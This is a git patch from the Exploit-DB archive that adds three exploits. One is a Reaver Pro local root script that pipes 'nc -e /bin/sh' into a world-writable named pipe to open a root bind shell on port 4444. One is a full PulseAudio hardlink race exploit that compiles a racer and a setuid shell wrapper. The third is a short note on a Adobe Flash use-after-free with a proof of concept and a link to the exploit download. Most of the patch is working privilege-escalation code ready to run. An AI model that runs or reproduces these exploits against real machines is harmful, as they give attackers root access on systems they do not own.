From 26ae373579f457d8d180114e44f6373fefec2026 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 30 Mar 2016 05:03:47 +0000
Subject: [PATCH] DB: 2016-03-30

3 new exploits

Adobe Flash - Object.unwatch Use-After-Free Exploit
---
 files.csv                           |   1 +
 platforms/linux/local/37898.py      |  23 ++++
 platforms/linux/local/9207.sh       | 183 ++++++++++++++++++++++++++++
 platforms/multiple/remote/39631.txt |  28 +++++
 4 files changed, 235 insertions(+)
 create mode 100755 platforms/linux/local/37898.py
 create mode 100755 platforms/linux/local/9207.sh
 create mode 100755 platforms/multiple/remote/39631.txt

diff --git a/files.csv b/files.csv
index 834f67c62..6c64f675b 100755
--- a/files.csv
+++ b/files.csv
@@ -35855,3 +35855,4 @@ id,file,description,date,author,platform,type,port
 39628,platforms/linux/local/39628.txt,"FireEye - Privilege Escalation to root from Malware Input Processor (uid=mip)",2016-03-28,"Google Security Research",linux,local,0
 39629,platforms/android/dos/39629.txt,"Android One mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0
 39630,platforms/windows/local/39630.g,"Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege",2016-03-28,mr_me,windows,local,0
+39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0
diff --git a/platforms/linux/local/37898.py b/platforms/linux/local/37898.py
new file mode 100755
index 000000000..4c1797a70
--- /dev/null
+++ b/platforms/linux/local/37898.py
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/55725/info
+
+Reaver Pro is prone to a local privilege-escalation vulnerability.
+
+A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers. 
+
+#!/usr/bin/env python
+import os
+print """
+          Reaver Pro Local Root
+   Exploits a hilarious named pipe flaw.
+The named pipe /tmp/exe is open to anyone...
+Any command echoed into it gets ran as root.
+This simply launches a bindshell on 4444...
+    Insecurety Research | insecurety.net
+"""
+print ""
+print "This is why TacNetSol should hire me?"
+print "[+] Sending command to named pipe..."
+cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe'''
+os.system(cmd)
+print "[+] Connecting to bind shell, enjoy root!"
+os.system("nc -v localhost 4444")
diff --git a/platforms/linux/local/9207.sh b/platforms/linux/local/9207.sh
new file mode 100755
index 000000000..31847aec0
--- /dev/null
+++ b/platforms/linux/local/9207.sh
@@ -0,0 +1,183 @@
+#!/bin/bash
+
+pulseaudio=`which pulseaudio`
+workdir="/tmp"
+#workdir=$HOME
+id=`which id`
+shell=`which sh`
+
+trap cleanup INT
+
+function cleanup()
+{
+	rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c 
+	rm -rf $workdir/PATMP*
+}
+
+cat > $workdir/pa_race.c << __EOF__
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#define PULSEAUDIO_PATH		"$pulseaudio"
+#define SH_PATH			"$workdir/sh"
+#define TMPDIR_TEMPLATE		"$workdir/PATMPXXXXXX"
+
+void _pause(long sec, long usec);
+
+int main(int argc, char *argv[], char *envp[])
+{
+	int   status;
+	pid_t pid;
+	char  template[sizeof(TMPDIR_TEMPLATE)];
+	char *tmpdir;
+	char  hardlink[sizeof(template) + 2];
+	char  hardlink2[sizeof(template) + 12];
+	
+	srand(time(NULL));
+	
+	for( ; ; )
+	{
+		snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE);
+		template[sizeof(template) - 1] = '\0';
+		
+		tmpdir = mkdtemp(template);
+		if(tmpdir == NULL)
+		{
+			perror("mkdtemp");
+			return 1;
+		}
+	
+		snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir);
+		hardlink[sizeof(hardlink) - 1] = '\0';
+	
+		snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir);
+		hardlink2[sizeof(hardlink2) - 1] = '\0';
+	
+		/* this fails if $workdir is a different partition */
+		if(link(PULSEAUDIO_PATH, hardlink) == -1)
+		{
+			perror("link");
+			return 1;
+		}
+		
+		if(link(SH_PATH, hardlink2) == -1)
+		{
+			perror("link");
+			return 1;
+		}
+		
+		pid = fork();
+		
+		if(pid == 0)
+		{
+			char *argv[] = {hardlink, NULL};
+			char *envp[] = {NULL};
+
+			execve(hardlink, argv, envp);
+			
+			perror("execve");
+			return 1;
+		}
+		
+		if(pid == -1)
+		{
+			perror("fork");
+			return 1;
+		}
+		else
+		{
+			/* tweak this if exploit does not work */
+			_pause(0, rand() % 500);
+			
+			if(unlink(hardlink) == -1)
+			{
+				perror("unlink");
+				return 1;
+			}
+	
+			if(link(SH_PATH, hardlink) == -1)
+			{
+				perror("link");
+				return 1;
+			}
+			waitpid(pid, &status, 0);
+		}
+		
+		if(unlink(hardlink) == -1)
+		{
+			perror("unlink");
+			return 1;
+		}
+		
+		if(unlink(hardlink2) == -1)
+		{
+			perror("unlink");
+			return 1;
+		}
+		
+		if(rmdir(tmpdir) == -1)
+		{
+			perror("rmdir");
+			return 1;
+		}
+	}
+		
+	return 0;
+}
+
+void _pause(long sec, long usec)
+{
+	struct timeval timeout;
+	
+	timeout.tv_sec  = sec;
+	timeout.tv_usec = usec;
+	
+	if(select(0, NULL, NULL, NULL, &timeout) == -1)
+	{
+		perror("select");
+	}
+}
+__EOF__
+
+cat > $workdir/sh.c << __EOF__
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+
+int main(int argc, char *argv[], char *envp[])
+{
+	if(geteuid() != 0)
+	{
+		return 1;
+	}
+
+	setuid(0);
+	setgid(0);
+
+	if(fork() == 0)
+	{
+		argv[0] = "$id";
+		argv[1] = NULL;
+		execve(argv[0], argv, envp);
+		return 1;
+	}
+
+	argv[0] = "$shell";
+	argv[1] = NULL;
+	execve(argv[0], argv, envp);
+	return 1;
+}
+__EOF__
+
+gcc -o $workdir/pa_race $workdir/pa_race.c
+gcc -o $workdir/sh $workdir/sh.c
+
+$workdir/pa_race
+
+# milw0rm.com [2009-07-20]
diff --git a/platforms/multiple/remote/39631.txt b/platforms/multiple/remote/39631.txt
new file mode 100755
index 000000000..17ce578ad
--- /dev/null
+++ b/platforms/multiple/remote/39631.txt
@@ -0,0 +1,28 @@
+Sources: 
+https://bugs.chromium.org/p/project-zero/issues/detail?id=716
+https://googleprojectzero.blogspot.ca/2016/03/life-after-isolated-heap.html
+
+The bug is an uninitialized variable in the fix to an ActionScript 2 use-after-free bug. Roughly 80 of these types of issues have been fixed by Adobe in the past year, and two uninitialized variable issues were introduced in the fixes. 
+
+ This issue is fairly easy to reproduce, a proof-of-concept for this issue in its entirety is:
+
+  var o = {};
+ o.unwatch();
+
+ The bug occurs because the use-after-free check in the unwatch method attempts to convert its first parameter to a string by calling toString on it before continuing with the part of the method where toString  could cause problems by freeing an object. However, Flash does not check that this parameter exists before calling toString on it. In pseudo-code, the rough behaviour of this method is:
+
+  void* args = alloca( args_size );
+ for( int i = 0; i < args_size; i++){
+  // Init args
+ }
+
+ if ( ((int) args[0]) & 6 == 6 )
+  args[0] = call_toString( args[0] );
+
+ if ( args_size < 1)
+  exit();
+
+
+Exploit:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39631.zip
+